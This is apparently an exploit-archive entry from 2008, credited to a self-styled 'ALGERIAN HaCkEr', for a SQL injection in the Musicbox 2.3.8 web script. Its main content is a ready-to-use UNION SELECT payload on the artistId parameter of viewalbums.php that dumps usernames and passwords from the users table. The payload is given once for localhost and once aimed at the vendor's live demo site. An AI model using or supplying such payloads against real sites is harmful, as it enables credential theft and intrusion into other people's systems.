id: 4199
date: 11/18/2008
title: Musicbox 2.3.8 (viewalbums.php artistId) SQL Injection Vulnerability
author: Snakespc
cves: 

====================================================================
Musicbox 2.3.8 (viewalbums.php artistId) SQL Injection Vulnerability
====================================================================


==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =                Discovered By: Snakespc  :::ALGERIAN HaCkEr:::         =     =   
                =                                                                                    =
                =                Sript Demo:http://www.musicboxv2.com/services/demo.php              =
                =                                www.musicboxv2.com                                  =              
                 =================================== Snakespc ======================================    


Exploit:

http://www.localhost/version2.3.8/viewalbums.php?artistId=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--

Demo :

http://www.musicboxv2.com/version2.3.8/viewalbums.php?artistId=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--
                                                                   
===================================================================================================================



#  0day.today [2023-03-22]  #